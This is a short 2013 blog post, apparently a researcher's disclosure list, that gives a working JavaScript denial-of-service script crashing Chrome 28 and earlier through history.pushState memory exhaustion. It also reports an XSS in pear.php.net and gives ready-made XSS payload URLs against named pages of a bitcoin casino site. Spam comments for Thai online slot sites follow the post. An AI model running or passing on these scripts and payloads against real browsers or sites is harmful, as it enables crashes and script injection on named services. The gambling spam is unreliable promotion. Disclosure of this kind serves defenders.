- Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
<script> var r="BOMB!";for(var e=0;e<22;e++){r+=r;} for(var d=0;d<100000;d++) { history.pushState({},r); } </script>Live demo
On android 4.2.2 @ nexus 7 this is quicker:<script> var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));} history.pushState({},r,r); </script>
- pear.php.net XSS
http://pear.php.net/support/lists.php (Email parameter was neither validated nor sanitized)
- satoshiroulette.com (bitcoin casino) XSS :
Examples:
http://satoshiroulette.com/game-info.php?mode=BTC&game=%3C/title%3E%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
http://satoshiroulette.com/render_address_roulette.php?mode=BTC&game=%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
Monday, July 22, 2013
In the meantime...
Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:
Subscribe to:
Post Comments (Atom)
รีวิวเกมสล็อตอัพเดตล่าสุด Age of Huracan ชมชนเผ่ามายา อีกหนึ่งวิดีโอสล็อตที่ได้รับการยอมรับจากนักพนันมากมาย https://www.megaslot.game/ ที่มาพร้อมกับฟังก์ชั่นการทำเงินก้อนโต
ReplyDeleteTry Slots ทดลองเล่นสล็อต คลิกที่นี้ with the most popular PG faction. No.1 online slot machine website, easy to play, 100% real money, come play demo with us today. Win many prizes Ready to get free credits to play slots games with the team. Happy to give advice 24 hours a day, even on holidays, can come and play all day without getting bored.
ReplyDelete